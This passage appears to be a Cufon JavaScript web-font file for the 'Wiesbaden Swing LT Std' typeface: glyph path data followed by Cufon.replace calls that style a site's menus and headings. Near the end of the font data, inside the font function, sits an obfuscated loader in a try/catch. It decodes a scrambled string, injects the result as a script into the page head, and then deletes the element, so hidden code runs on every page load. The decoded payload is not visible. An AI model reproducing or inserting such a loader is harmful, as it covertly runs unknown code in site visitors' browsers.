18v5,17,18,59,18,110v0,13,-1,61,-27,61v-27,0,-38,-52,-28,-61v7,21,19,62,27,53v14,0,16,-38,16,-50v0,-37,-6,-74,-19,-108v-15,7,-47,30,-64,50v-2,0,-7,-1,-7,-4","w":166,"k":{",":48,".":48,"M":27,"a":34,"A":27,"e":34,"o":34,"y":27,"h":21,"i":13,"r":34,"u":34,"w":34,":":34,"-":34,";":34}},{"d":"5,-62v8,-8,22,-14,27,-17v1,-20,-9,-59,11,-61v11,11,-5,32,-1,55v7,-3,28,-15,38,-9v-7,15,-22,8,-38,19v3,11,-6,66,13,69v15,2,16,-29,25,-16v0,5,-10,25,-27,25v-28,0,-19,-46,-22,-72v-8,1,-24,25,-26,7","w":86},{"d":"145,-158v-8,24,-27,-10,-36,-6v-27,0,-84,40,-84,95v0,36,26,69,68,69v41,0,99,-38,99,-86v0,-46,-80,-57,-124,-37v0,-4,26,-17,61,-17v37,0,78,17,78,54v0,42,-59,95,-122,95v-57,0,-74,-44,-74,-73v0,-61,62,-109,107,-109v16,0,27,6,27,15","w":213,"k":{",":14,".":14,"X":27}},{"w":66,"k":{"T":21,"V":27,"Y":14}},{"d":"29,-93v0,-46,-9,-74,17,-77v9,1,1,12,1,17v-9,54,-12,116,7,146v-9,17,-19,5,-21,-11v-2,-11,-4,-38,-4,-75","w":66},{"d":"34,-102r-4,-44v0,-8,4,-9,7,-9v16,6,1,35,3,53r-6,0","w":73},{"d":"45,-55v22,-32,28,-43,53,-50v11,-3,17,17,7,20v-7,-1,-1,-11,-7,-11v-17,0,-45,46,-47,49v13,17,27,30,39,43v0,1,-5,7,-8,7v-12,-7,-27,-30,-37,-40v-8,11,-16,31,-24,43v-1,0,-8,-3,-8,-5v0,-2,14,-29,25,-47v0,-9,-46,-33,-20,-39v9,4,17,16,27,30","w":100},{"d":"31,-92v11,25,10,63,10,93v0,27,-3,80,-31,80v-28,0,-39,-47,-29,-54v9,5,4,41,29,45v17,3,21,-59,20,-68v-1,-62,-5,-77,-11,-91v0,-4,12,-5,12,-5xm12,-147v12,2,18,33,7,34v-9,-2,-7,-23,-14,-30v0,-3,6,-4,7,-4","w":60},{"d":"166,-145v36,21,10,165,-30,165v-15,0,-24,-16,-30,-51v-7,-37,-8,-75,-7,-113v-66,1,-79,31,-79,48v0,21,13,32,24,28v6,3,3,12,-5,12v-12,0,-27,-17,-27,-39v0,-32,42,-59,87,-61v-3,-10,11,-25,15,-13v-2,19,-3,37,-3,58v0,22,9,173,46,97v9,-17,28,-97,-1,-125v0,-3,8,-6,10,-6","w":200,"k":{",":14,".":14,":":7,";":7}},{"d":"72,-69v-13,15,-31,59,-44,73v-10,1,-9,-14,-6,-23v2,-18,11,-54,5,-63v-1,0,-5,0,-9,10v-4,9,-7,9,-11,4v0,-1,10,-26,24,-26v7,0,9,6,9,12v0,14,-4,42,-8,66v16,-30,29,-63,49,-72v6,-1,5,8,4,13v-1,6,-6,30,-3,50v4,0,29,-50,31,-55v4,-11,9,-19,18,-13v-2,23,-10,90,21,82v1,0,2,2,2,3v0,4,-7,8,-13,8v-28,-1,-21,-53,-23,-71v-14,26,-21,55,-40,60v-18,0,-5,-49,-6,-58","w":153},{"d":"71,0r0,-58r-58,0r0,-11r58,0r0,-58r12,0r0,58r57,0r0,11r-57,0r0,58r-12,0","w":153},{"d":"120,-122v0,9,-10,3,-15,2v-6,0,-18,2,-27,4v4,8,37,34,21,38v-9,-8,-13,-19,-29,-35v-9,12,-15,36,-24,42v-13,-5,11,-30,13,-40v-9,1,-34,20,-40,6v8,-10,32,-7,45,-15v-13,-17,-22,-19,-27,-28v0,-4,3,-4,4,-4v6,0,22,19,28,25v1,-1,16,-27,25,-36v2,0,4,2,4,4v0,2,-18,30,-21,35v25,-4,37,-9,43,2"},{"d":"60,-72v-7,10,-27,59,-40,76v-1,0,-9,-3,-9,-6v0,-5,6,-78,7,-80v10,-7,18,-13,11,14v-7,27,-6,42,-7,51v13,-26,17,-35,29,-55v12,-21,14,-30,25,-22v-3,10,-5,23,-5,34v0,5,0,53,18,53v6,2,13,-12,16,-3v0,5,-10,10,-18,10v-26,-1,-30,-45,-27,-72","w":100},{"d":"59,-32v23,16,35,31,57,24v1,0,4,1,4,4v-16,22,-61,-15,-68,-22v-13,8,-32,40,-48,26v5,-8,16,-52,28,-49v5,0,8,2,20,11v19,-18,23,-23,40,-43v-2,0,-35,-1,-35,5v2,2,14,10,1,12v-5,0,-11,-4,-11,-11v0,-12,14,-15,51,-15v2,-6,10,-14,18,-8v-9,19,-40,50,-57,66xm45,-31v-20,-21,-19,12,-29,23v12,-9,15,-10,29,-23"},{"d":"32,-86v1,-32,-2,-74,30,-80v1,0,8,0,8,5v-1,7,-6,13,-11,8v-5,0,-15,14,-15,62v14,-5,32,-15,45,-9v-8,17,-24,4,-45,18v3,41,-3,146,34,135v2,0,3,1,3,2v0,2,-5,7,-12,7v-45,-10,-32,-106,-37,-139v-7,2,-25,20,-27,7v0,-2,1,-2,27,-16","w":79,"k":{",":14,".":14}},{"d":"115,-166r-83,164v0,9,-15,8,-18,5r83,-166v2,-4,3,-4,13,-4v5,0,5,0,5,1"},{"d":"43,-31v0,52,39,32,51,12v7,8,-16,32,-38,33v-22,0,-26,-26,-26,-45v0,-39,19,-139,60,-139v22,0,29,22,14,26v-2,-1,-10,-19,-14,-16v-21,0,-47,76,-47,129"},{"d":"83,-79v10,17,41,53,76,75v0,2,-2,5,-5,5v-14,0,-46,-24,-78,-68v-12,19,-45,83,-50,132v-2,15,-12,20,-15,8v0,-22,32,-108,58,-148r-47,-70v0,-1,11,-8,14,-8v14,14,29,50,42,65v15,-22,53,-78,93,-78v21,0,23,20,15,27v-5,-3,-9,-19,-20,-17v-29,0,-68,54,-83,77","w":173},{"d":"28,3v-16,-4,-11,-31,-11,-46v0,-22,0,-30,5,-95v-1,-9,12,-15,17,-10v-7,33,-14,73,-13,111v17,-19,27,-34,34,-48v3,-5,14,-8,15,-2v0,3,-27,38,-31,43v0,1,41,28,60,40v0,1,-6,7,-8,7v-4,0,-49,-32,-59,-39v-11,7,-14,27,-1,33v0,1,-3,6,-8,6","w":100},{"d":"84,-72v-19,5,-54,18,-75,30v-4,-3,-8,-5,1,-9v1,-1,8,-5,9,-6v17,-33,31,-60,61,-102v9,-4,17,-2,7,10v-18,21,-45,63,-55,86v16,-8,36,-13,53,-18v1,-15,5,-52,22,-43v-4,15,-5,20,-8,39v20,-4,47,-14,63,-1v-2,7,-22,19,-22,9v0,-2,5,-4,9,-6v-14,-1,-38,3,-52,7v-2,14,-11,62,7,72v0,2,-5,8,-13,8v-17,-17,-9,-50,-7,-76","w":159},{"d":"6,-162v0,0,-5,-6,4,-5v12,0,12,0,13,4r83,166v-2,3,-18,3,-17,-2"},{"d":"3,-95v34,-34,101,-74,164,-75v5,0,34,0,34,20v0,29,-64,86,-97,83v1,40,-5,50,10,63v4,1,12,-10,14,-2v0,4,-7,11,-16,11v-27,0,-21,-48,-21,-76v0,-24,2,-51,4,-75v-39,17,-58,37,-87,54v-4,0,-5,-2,-5,-3xm104,-77v28,3,81,-39,84,-70v-3,-26,-58,-10,-78,-4v-5,27,-6,64,-6,74","w":193,"k":{",":65,".":65,"a":34,"A":27,"e":34,"o":34,"y":27}},{"d":"58,-71v-18,2,-43,22,-55,7v0,-1,42,-14,56,-17v2,-14,-2,-61,8,-86v5,-1,13,-8,14,-3v0,7,-8,18,-10,87v24,-5,50,-8,77,-5v5,8,-3,17,-13,11v-21,-4,-44,-1,-64,3v-1,77,2,81,16,93v0,1,-6,8,-9,8v-17,0,-22,-70,-20,-98xm172,-154v3,28,-22,132,8,145v0,3,-7,10,-9,10v-15,-8,-18,-17,-18,-50v7,-19,-14,-114,19,-105","w":193},{"d":"66,-9v-5,-18,-51,-72,-44,-78v7,-23,59,4,55,15v0,4,-5,7,-7,7v-6,-5,-25,-30,-34,-20v3,15,45,66,41,75v0,9,-7,16,-20,16v-25,0,-52,-20,-52,-37v0,-9,9,-12,12,-8v-10,21,23,34,40,36v7,0,9,-4,9,-6","w":86},{"d":"18,-129v8,-38,60,-11,86,-30v7,-1,14,-4,16,-1v-20,22,-47,64,-50,74v17,-2,41,-3,51,5v0,3,-16,8,-17,8v-4,-7,-23,-5,-38,-4v-23,52,-30,65,-23,87v-2,10,-22,6,-18,-4v0,-20,15,-57,28,-82r-38,4v-3,0,-3,-2,-3,-5v6,-6,34,-5,45,-8v0,0,14,-29,33,-58v-18,1,-50,-3,-58,11v9,5,4,13,-6,14v-4,0,-8,-5,-8,-11"},{"d":"21,-43v-9,3,-9,-11,-4,-11r85,1v4,0,4,0,4,5v0,5,-1,5,-9,5r-76,0"},{"d":"13,-56v10,30,40,65,72,68v7,0,16,-3,16,-26v0,-36,-31,-103,-41,-145v11,-39,95,6,91,20v-1,7,-14,16,-17,7v6,-16,-25,-31,-49,-34v-6,0,-9,2,-9,7v9,47,39,105,38,144v0,21,-8,37,-30,37v-36,0,-80,-59,-80,-79v0,-9,14,-16,20,-7v-2,5,-12,0,-11,8","w":140},{"d":"44,-134v0,8,14,8,18,12v0,1,-4,9,-7,9v-6,0,-24,-11,-24,-20v0,-10,26,-22,59,-24v-8,-8,-10,-20,5,-20v18,26,16,66,18,118v0,22,1,108,-36,108v-36,0,-65,-60,-65,-102v0,-18,16,-14,15,-4v-16,24,18,94,49,96v23,2,28,-65,27,-83v1,-5,-5,-88,-9,-100v-16,-4,-51,5,-50,10","w":133},{"d":"105,-4v18,-15,-3,-70,-15,-69v0,-4,4,-9,6,-9v3,0,25,25,25,61v0,5,0,26,-16,26v-22,0,-36,-36,-39,-56v-9,22,-34,78,-49,78v-8,0,-8,-10,-8,-18v0,-20,6,-55,23,-92v12,-24,11,-24,21,-18v-17,28,-39,90,-33,118v15,-18,21,-39,40,-80v1,-4,4,-10,10,-10v3,0,3,1,5,15v4,31,20,54,30,54","w":133},{"d":"273,-179v5,30,-19,192,50,169v1,0,2,1,2,2v0,5,-11,10,-20,10v-48,0,-46,-109,-46,-130v-16,24,-47,86,-47,116v0,1,-9,13,-10,13v-1,0,-17,-16,-53,-116v-29,148,-98,152,-108,152v-31,0,-50,-34,-50,-46v-2,-9,16,-15,18,-5v1,5,-8,4,-7,8v0,10,17,35,40,35v52,-1,92,-93,98,-160v0,-10,-5,-19,-9,-27v0,-3,11,-9,13,-9v20,45,34,108,57,140v10,-37,36,-86,57,-118v0,-4,0,-27,2,-30v3,-3,13,-4,13,-4","w":320},{"d":"13,-84r0,-11r127,0r0,11r-127,0xm13,-33r0,-11r127,0r0,11r-127,0","w":153},{"d":"114,-21v2,26,-28,35,-48,25v-3,10,-8,31,-20,20v0,-1,6,-23,7,-26v-10,-5,-37,-18,-37,-56v1,-11,10,-13,10,-6v-5,36,35,62,62,62v14,0,15,-14,15,-18v7,-17,-41,-84,-50,-118v-3,-12,24,-18,37,-13v4,-16,4,-35,22,-26r-9,30v19,11,31,15,15,23v-12,-7,-41,-31,-51,-13v6,21,57,106,47,116","w":146},{"d":"25,-126v12,-23,31,-36,69,-36v17,0,19,8,19,11v3,15,-66,60,-74,91v8,26,44,-6,73,-21v1,0,2,1,2,3v0,7,-42,36,-70,36v-10,0,-19,-6,-19,-15v0,-13,11,-23,39,-53v34,-36,34,-36,34,-39v-19,-10,-73,18,-59,26v0,3,-4,5,-7,5v-6,0,-7,-6,-7,-8xm70,-27v2,11,5,25,13,30v-14,14,-28,-13,-26,-23v-1,-6,11,-6,13,-7","w":133},{"d":"39,-76v4,-42,-8,-89,20,-77v-4,37,-21,88,5,106v0,2,-11,8,-13,8v-10,0,-14,-23,-12,-37xm65,-27v2,11,5,26,13,30v-14,16,-28,-13,-27,-22v-1,-6,11,-6,14,-8","w":93},{"d":"180,-27r4,5v-14,10,-37,25,-76,25v-65,0,-97,-44,-97,-88v0,-54,44,-95,102,-95v50,0,82,31,82,73v0,36,-23,64,-49,64v-15,0,-24,-13,-16,-28v-4,9,-14,28,-38,28v-18,0,-33,-13,-33,-36v0,-26,19,-59,49,-59v19,0,30,11,31,30r8,-27r8,0v-7,25,-17,47,-21,75v0,5,3,12,13,12v21,0,43,-28,43,-59v0,-36,-28,-67,-78,-67v-118,-1,-131,170,-4,171v37,0,59,-15,72,-24xm94,-49v41,-4,60,-79,15,-83v-39,-2,-62,80,-15,83","w":206},{"d":"103,-93v-13,16,-61,118,-89,127v-2,0,-6,0,-6,-6v-4,-4,33,-160,46,-203v2,-2,16,-9,17,-4v-26,61,-53,190,-49,195v7,-11,76,-105,74,-134v0,-4,16,-13,19,-7r0,18v-1,13,13,115,40,104v18,0,31,-25,31,-53v0,-42,-18,-80,-37,-74v-1,0,-6,-4,-6,-9v0,-4,3,-5,6,-5v52,7,75,151,4,151v-23,0,-32,-21,-37,-38v-5,-14,-5,-17,-13,-62","w":213,"k":{",":14,".":14,":":7,";":7}},{"d":"17,-102r-4,-44v0,-1,0,-9,7,-9v18,6,2,35,3,53r-6,0xm47,-102r-5,-43v0,-2,0,-10,8,-10v16,7,1,33,3,53r-6,0","w":73},{"d":"140,-57v11,-13,15,-27,26,-36v14,7,-4,21,-17,43v6,5,22,10,32,15v-8,23,-13,14,-41,-5v-19,19,-59,52,-100,52v-16,0,-32,-7,-32,-22v0,-39,52,-70,78,-92r-25,-36v-6,6,-10,-1,-11,-5v0,-5,31,-32,65,-32v17,0,33,8,33,24v0,17,-17,29,-48,51v12,15,24,31,40,43xm91,-93v-29,27,-56,40,-68,78v0,15,17,15,21,15v23,0,56,-15,87,-47v-15,-14,-24,-24,-40,-46xm95,-109v13,-11,34,-20,38,-39v0,-10,-10,-15,-22,-15v-4,0,-23,1,-41,16v6,9,14,23,25,38","w":193},{"d":"109,-12v-25,-2,-95,44,-109,57v-7,-2,-12,-7,-4,-11r18,-13v10,-34,38,-153,1,-181v0,-5,8,-6,12,-6v18,0,20,43,20,60v0,31,-10,88,-20,118v6,-9,99,-54,117,-21v-8,18,-18,-2,-35,-3","w":140,"k":{"T":27,"V":34,"Y":27}},{"d":"143,-40v6,28,-56,62,-56,21v0,-19,14,-40,36,-40v8,0,20,4,20,19xm108,-8v14,1,38,-36,14,-42v-18,-2,-35,36,-14,42xm77,-122v7,26,-55,61,-55,20v0,-18,13,-40,35,-40v8,0,20,5,20,20xm42,-91v15,1,39,-36,14,-42v-17,-2,-34,36,-14,42xm44,0v4,6,7,12,-4,13v-27,-8,18,-61,18,-61v13,-17,54,-73,73,-93v1,-2,13,-4,16,0v-37,37,-103,126,-103,141","w":159},{"d":"122,-5v-5,-5,-23,-16,-27,-22v1,-2,13,-15,17,-8r24,23v37,-19,56,-48,56,-74v0,-47,-81,-56,-125,-37v0,-4,27,-17,62,-17v42,0,78,20,78,52v0,44,-50,75,-64,82v17,13,46,44,69,36v0,0,2,0,2,2v0,3,-4,7,-13,7v-23,0,-49,-21,-71,-38v-15,6,-30,8,-45,8v-56,0,-75,-43,-75,-73v0,-61,63,-109,108,-109v25,0,37,21,15,24v-33,-41,-103,15,-108,80v-4,44,46,84,97,64","w":213,"k":{".":14}},{"d":"186,-84v-10,15,-11,0,-23,0v-14,0,-30,3,-43,7v0,25,-7,77,16,84v7,0,8,0,8,3v0,5,-9,5,-12,5v-26,0,-25,-51,-24,-88r-42,19v-2,0,-4,-5,-4,-6v1,-5,36,-18,46,-22v0,-7,4,-63,7,-66v4,-2,13,-7,15,-4v0,6,-6,9,-10,66v24,-6,35,-7,44,-7v4,0,22,0,22,9xm177,-184v20,1,35,1,42,16v-2,6,-15,20,-16,4v-3,-10,-14,-11,-24,-11v-68,1,-139,40,-171,69v-3,0,-6,-4,-6,-6v20,-27,117,-76,175,-72","w":193,"k":{",":48,".":48}},{"d":"28,-70v0,-12,21,-13,21,0v0,13,-21,13,-21,0xm42,31v-6,-9,5,-38,-7,-45v8,-11,19,-8,20,14v0,16,-9,31,-13,31","w":79,"k":{" ":7}},{"d":"112,-170v-7,14,-20,-17,-34,-11v-39,16,-11,78,-27,114v11,-5,22,-7,23,13v3,47,-39,120,1,128v5,0,26,-3,34,-38v1,-6,2,-8,5,-8v14,22,-15,57,-41,56v-51,-1,-7,-103,-10,-137v0,-3,0,-7,-4,-7v-3,-3,-21,19,-24,6v9,-17,9,-38,9,-65v0,-21,3,-71,35,-71v15,0,33,12,33,20"},{"d":"73,-160v-6,0,-10,6,-15,9v-10,-7,-4,-20,13,-20v28,0,28,43,28,51v0,37,-20,135,-55,135v-23,0,-40,-37,-31,-48v5,7,8,36,28,36v23,0,46,-80,46,-127v0,-3,0,-36,-14,-36"},{"d":"140,-157v36,10,90,59,90,99v0,35,-36,59,-81,59v-42,0,-65,-15,-78,-23v-10,18,-19,47,-37,57v-4,0,-7,-4,-7,-7v9,-30,10,-75,3,-116v0,-2,0,-5,6,-5v5,0,5,1,8,12v3,11,9,28,25,43v1,-3,49,-97,58,-115v-34,-11,-92,-8,-105,18v-1,5,-9,2,-8,-2v3,-30,81,-36,116,-24v20,-41,25,-44,32,-44v6,-2,13,13,5,14v-4,-2,-7,-5,-10,2v-5,11,-12,21,-17,32xm136,-149r-60,118v11,7,37,23,76,23v68,0,80,-59,45,-101v-19,-24,-46,-34,-61,-40xm63,-28v-13,-11,-17,-20,-21,-28v5,22,0,64,-5,75v9,-14,12,-20,26,-47","w":240},{"d":"87,-159v-11,49,-16,134,0,156v0,3,-5,7,-9,7v-14,0,-13,-49,-13,-63v0,-5,0,-36,2,-61v-15,18,-45,40,-55,40v-7,-1,-6,-8,0,-10v23,-6,55,-43,56,-44v3,-12,-1,-31,14,-30v3,0,5,2,5,5","w":106},{"d":"39,-12v26,0,45,-36,57,-49v0,-2,-5,-4,-6,-9v0,-3,11,-7,12,-7v22,21,28,80,28,98v0,38,-15,82,-46,81v-43,0,-75,-53,-75,-59v0,-3,10,-8,11,-8v9,28,44,59,66,58v52,-3,29,-130,17,-146v-16,17,-35,53,-69,53v-19,0,-21,-14,-21,-22v0,-45,60,-150,116,-150v17,0,9,15,5,16v-4,-2,-6,-7,-13,-6v-36,0,-95,90,-95,136v0,6,3,14,13,14","w":140},{"d":"255,-191v-8,32,-34,118,-20,190v0,2,-7,8,-10,8v-7,0,-61,-115,-73,-136v-11,63,-48,164,-108,161v-45,-2,-48,-55,-35,-79v8,2,-1,15,1,21v0,14,8,54,36,49v69,-11,83,-104,97,-168v-2,-6,-10,-16,-16,-25v0,-3,10,-7,12,-7r81,154v-5,-53,11,-137,21,-163v2,-4,11,-5,14,-5","w":259},{"d":"99,1v-28,-12,-18,-26,-28,-63v-7,12,-41,62,-55,62v-2,0,-9,-1,-9,-8v1,-23,36,-89,60,-83v-9,-11,7,-27,12,-14v2,36,5,92,25,102v0,1,-1,4,-5,4xm19,-11v5,-3,63,-61,44,-70v-13,1,-52,57,-44,70","w":106},{"d":"227,1v-14,8,-110,-61,-114,-83v4,-3,15,-8,17,0v23,1,74,-34,74,-56v0,-15,-21,-16,-31,-16v-16,0,-41,2,-56,7v-15,62,-26,117,-17,157v-2,8,-15,9,-15,-3v-1,-51,7,-97,16,-149v-39,13,-77,32,-87,49v-4,6,-10,4,-12,0v7,-22,128,-80,170,-70v11,0,48,1,48,21v0,27,-52,60,-85,67v54,60,86,65,104,69v0,4,-8,7,-12,7","w":233},{"d":"86,-110v-3,50,-11,138,16,162v0,3,-4,8,-8,8v-11,0,-15,-20,-17,-33v-4,-27,-5,-54,-5,-81v-8,17,-38,54,-55,54v-6,0,-9,-3,-9,-8v3,-26,36,-80,64,-78v-5,-14,3,-35,14,-24xm21,-10v8,-1,62,-53,46,-68v-11,1,-54,52,-46,68","w":106},{"d":"79,-165v-29,9,-38,7,-65,6v-2,0,-5,0,-5,-3v0,-3,1,-4,14,-4v30,1,45,-3,64,-13v4,3,17,10,4,12v13,39,-6,148,-12,171v-18,8,-65,17,-81,1v15,-12,36,10,69,-8v5,-19,27,-117,12,-162"},{"d":"62,-152v31,-1,55,43,55,77v0,34,-23,80,-58,80v-21,0,-40,-25,-40,-83v0,-60,24,-74,43,-74xm105,-75v0,-21,-13,-67,-45,-67v-27,0,-29,40,-29,63v0,61,23,71,35,71v19,0,39,-32,39,-67","w":126},{"d":"63,-131v32,-2,46,-16,60,-23v1,0,3,2,3,4v0,5,-24,24,-67,28v-2,5,-7,20,-9,30v37,-18,97,1,97,34v0,35,-53,65,-97,65v-24,0,-57,-14,-40,-29v3,0,3,1,3,4v22,35,126,4,119,-39v-8,-51,-83,-33,-102,-14v-10,-4,-1,-12,6,-15v9,-14,5,-59,29,-50v0,1,-1,1,-2,5","w":153},{"d":"24,-8v0,-12,21,-13,21,0v0,13,-21,13,-21,0","w":66,"k":{" ":14}},{"d":"24,0r-12,0r21,-58r-32,0r4,-11r32,0r17,-46r-32,0r4,-11r32,0r21,-58r13,0r-21,58r37,0r21,-58r12,0r-21,58r32,0r-4,11r-32,0r-17,46r32,0r-4,11r-32,0r-21,58r-12,0r21,-58r-37,0xm50,-69r37,0r17,-46r-37,0","w":153},{"d":"194,-149v0,13,-46,52,-60,55v37,-5,79,11,79,38v0,26,-42,45,-48,48v-15,7,-41,13,-68,12v-6,-41,-1,-110,1,-142v-35,13,-62,33,-89,53v-1,0,-8,-3,-8,-5v68,-58,156,-77,163,-72v4,0,30,-1,30,13xm105,-86v45,-23,77,-50,77,-60v0,-8,-13,-8,-18,-8v-17,0,-39,5,-54,12v-3,29,-4,40,-5,56xm108,-7v40,4,93,-25,93,-49v0,-21,-58,-45,-96,-19v0,2,-1,42,3,68","w":219},{"d":"140,-6r-127,-52r0,-13r127,-51r0,13r-112,45r112,45r0,13","w":153},{"d":"32,-20v19,2,5,54,-4,52v-6,-9,7,-35,-6,-45v0,-1,9,-7,10,-7","w":66,"k":{" ":14}},{"d":"20,-89v-2,-9,14,-13,16,-7v0,2,-5,29,-6,32v13,-13,32,-30,51,-30v16,0,20,11,20,17v0,15,-39,78,-75,78v1,31,-4,50,8,61v3,-1,9,-6,9,1v0,4,-6,8,-12,8v-23,-13,-17,-12,-17,-59v0,-25,2,-49,6,-101xm29,-48v-1,14,-2,16,-3,40v31,-4,63,-46,63,-68v0,-4,-2,-9,-9,-9v-13,0,-39,23,-51,37","w":106,"k":{",":34,".":34}},{"d":"146,-158v-6,14,-16,5,-24,2v-23,0,-77,43,-94,104v28,-15,44,-31,90,-35v6,-3,22,8,7,9v-46,1,-59,12,-98,39v0,6,2,31,34,31v40,0,81,-35,103,-49v2,0,3,2,3,3v0,11,-87,77,-138,50v-13,-7,-16,-23,-16,-29v0,-23,15,-64,51,-100v25,-24,50,-34,63,-34v10,0,19,4,19,9","w":173,"k":{"M":21}},{"d":"13,-122r127,52r0,12r-127,52r0,-13r113,-45r-113,-45r0,-13","w":153},{"d":"41,-108v14,-20,29,-49,67,-49v11,0,16,8,16,18v0,31,-34,74,-64,103v41,30,56,51,85,23v1,0,4,1,4,5v-15,38,-84,-2,-98,-20v-18,12,-43,39,-55,22v0,-1,9,-17,18,-30v21,-32,20,-23,39,-8v28,-26,58,-68,58,-92v0,-5,-1,-10,-7,-10v-19,0,-46,29,-47,33v3,9,-15,11,-16,5xm9,-10v24,-18,47,-21,24,-36v-11,14,-17,25,-24,36","w":140},{"d":"79,-84v-15,-1,-37,16,-40,41v-3,0,-7,-8,-7,-11v0,-9,19,-39,50,-39v17,0,22,12,22,24v0,28,-36,72,-64,72v-23,0,-27,-26,-27,-45v0,-54,30,-116,56,-116v2,0,8,1,8,6v0,9,-7,10,-12,6v-22,3,-44,89,-39,102v0,6,-1,36,16,36v17,0,51,-33,51,-60v0,-10,-5,-16,-14,-16","w":113},{"d":"21,-85v11,3,15,34,20,45v6,-24,21,-56,45,-61v12,-1,14,18,5,19v-6,0,-6,-8,-9,-9v-12,-5,-37,57,-32,58v-2,8,12,33,-2,35v-5,0,-5,-4,-8,-14v-10,-34,-17,-54,-30,-65v0,-3,8,-8,11,-8","w":93,"k":{",":34,".":34}},{"d":"60,-8v27,0,51,-30,63,-40v3,0,4,1,4,4v0,5,-32,48,-74,48v-36,0,-39,-39,-39,-48v0,-59,59,-129,95,-129v7,0,13,4,13,11v0,14,-22,41,-35,48v-15,-10,27,-25,24,-43v0,-3,-1,-6,-6,-6v-26,0,-79,65,-79,115v0,21,10,40,34,40","w":133}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+219-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("V[ik3lIS>eO|VYyMBl1Z4[4OzgIkilO|zgqZ>er#id,-L+SE*7i->npOBe%X>FG+=eO#edd>vk]yekO}Heru4[qFBGO?BJ!`LJ;qqAcNdlSKVl]Qiy`jV1cKI1~?FGc+IZkJv#BIhvtw4F;zzY4lJYdrr_)MVFt~rS]cF#1B%nF|4S4,57;1h_4g?T%E5#I`3[ySVY4EVv~phJ!-?nkE5#!-3nk`5l~y3lBS>Y~#he4|iE]#37y`>7!;YnG1[74qV5%IHhtrvJFdezLi>3?B=*ucE_Tyl#@pNK-)|j`~Z+SkgAX]QM,O}w%O=ASM>eL@LE]j>+SjzEuwH#BABk`|VJ,@h+pSizISLg~pie]SIJ1?5lkpBe)?5lIj3z`|Vk`|Ll1+>e~T3g]E3g]TzY]_3gk,5E)?5lqc?gy-i[O|LlO|i1`|LgO?5#dK*YXKzY]yLzI]Le]+BgdZzY]|iztpqYOp5#ry?At@3[O_Lzrp3gX|>[O+B[]c3eFpVeij?EuM>J~-HZ-K>vy#egI3>dkBhz;3>dkOVvup")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":119,"face":{"font-family":"Wiesbaden Swing LT Std","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"3 6 4 2 4 3 2 3 2 4","ascent":"164","descent":"-196","x-height":"1","bbox":"-22.6273 -283 325 102.017","underline-thickness":"18","underline-position":"-18","stemh":"9","stemv":"11","unicode-range":"U+0020-U+007E"}}));


Cufon.replace('#main_menu li a', {'fontSize':'35px'});
Cufon.replace('#product_general_desc h1', {'fontSize':'60px', 'padding':'0'});
Cufon.replace('#news_general_desc h1', {'fontSize':'60px', 'padding':'0'});
Cufon.replace('#stockists_general_desc h1', {'fontSize':'60px', 'padding':'0'});
Cufon.replace('#history_general_desc h1', {'fontSize':'60px', 'padding':'0'});
Cufon.replace('#contact_general_desc h1', {'fontSize':'60px', 'padding':'0'});
Cufon.replace('h2', {'fontSize':'40px'});
Cufon.replace('#new_container ul li .news_info h3', {'fontSize':'40px'});
